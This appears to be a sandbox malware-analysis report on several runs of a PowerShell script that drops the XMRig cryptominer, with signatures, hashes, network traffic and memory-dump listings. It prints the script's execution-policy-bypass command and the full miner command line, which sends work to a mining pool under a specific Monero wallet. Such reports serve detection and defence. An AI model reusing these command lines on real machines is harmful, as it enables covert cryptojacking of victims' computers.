| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4320 wrote to memory of 876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4320 wrote to memory of 876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
Files
memory/4320-0-0x00007FFB82733000-0x00007FFB82735000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1w31ujq.rbm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4320-10-0x00000156EE360000-0x00000156EE382000-memory.dmp
memory/4320-11-0x00007FFB82730000-0x00007FFB831F1000-memory.dmp
memory/4320-12-0x00007FFB82730000-0x00007FFB831F1000-memory.dmp
memory/4320-14-0x00007FFB82730000-0x00007FFB831F1000-memory.dmp
memory/4320-15-0x00000156EF6D0000-0x00000156EF6E2000-memory.dmp
memory/4320-16-0x00000156EE930000-0x00000156EE93A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/876-47-0x000001E746F20000-0x000001E746F40000-memory.dmp
memory/876-48-0x000001E748A30000-0x000001E748A50000-memory.dmp
memory/876-49-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-51-0x000001E748A50000-0x000001E748A70000-memory.dmp
memory/876-50-0x000001E748A70000-0x000001E748A90000-memory.dmp
memory/876-52-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/4320-53-0x00007FFB82733000-0x00007FFB82735000-memory.dmp
memory/4320-54-0x00007FFB82730000-0x00007FFB831F1000-memory.dmp
memory/876-55-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/4320-56-0x00007FFB82730000-0x00007FFB831F1000-memory.dmp
memory/876-59-0x000001E748A50000-0x000001E748A70000-memory.dmp
memory/876-58-0x000001E748A70000-0x000001E748A90000-memory.dmp
memory/876-57-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-60-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-61-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-62-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-63-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-64-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-65-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-66-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-67-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-68-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-69-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-70-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-71-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-72-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-73-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-74-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-75-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-76-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-77-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-78-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-79-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-80-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-81-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-82-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-83-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-84-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-85-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-86-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-87-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-88-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-89-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-90-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-91-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-92-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-93-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-94-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-95-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-96-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-97-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-98-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-99-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-100-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-101-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-102-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-103-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-104-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-105-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-106-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-107-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-108-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-109-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-110-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-111-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-112-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-113-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-114-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-115-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-116-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-117-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
memory/876-118-0x00007FF764590000-0x00007FF7651C3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:37
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3376 wrote to memory of 4224 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3376 wrote to memory of 4224 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/3376-4-0x00007FF840123000-0x00007FF840124000-memory.dmp
memory/3376-5-0x0000025B9EFE0000-0x0000025B9F002000-memory.dmp
memory/3376-6-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-10-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-9-0x0000025B9F1B0000-0x0000025B9F226000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eedo4vtr.zmm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3376-25-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-48-0x0000025B9F330000-0x0000025B9F342000-memory.dmp
memory/3376-61-0x0000025B9F080000-0x0000025B9F08A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4224-90-0x0000026AAA380000-0x0000026AAA3A0000-memory.dmp
memory/4224-91-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-92-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/3376-93-0x00007FF840123000-0x00007FF840124000-memory.dmp
memory/3376-94-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/4224-95-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-96-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-97-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-98-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-99-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-100-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-101-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-102-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-103-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-104-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-105-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-106-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-107-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-108-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-109-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-110-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-111-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-112-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-113-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-114-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-115-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-116-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-117-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-118-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-119-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-120-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-121-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-122-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-123-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-124-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-125-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-126-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-127-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-128-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-129-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-130-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-131-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-132-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-133-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-134-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-135-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-136-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-137-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-138-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-139-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-140-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-141-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-142-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-143-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-144-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-145-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-146-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-147-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-148-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-149-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-150-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-151-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-152-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-153-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-154-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
memory/4224-155-0x00007FF7131E0000-0x00007FF713E13000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10v2004-20240426-en
Max time kernel
1800s
Max time network
1743s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 1904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4840 wrote to memory of 1904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
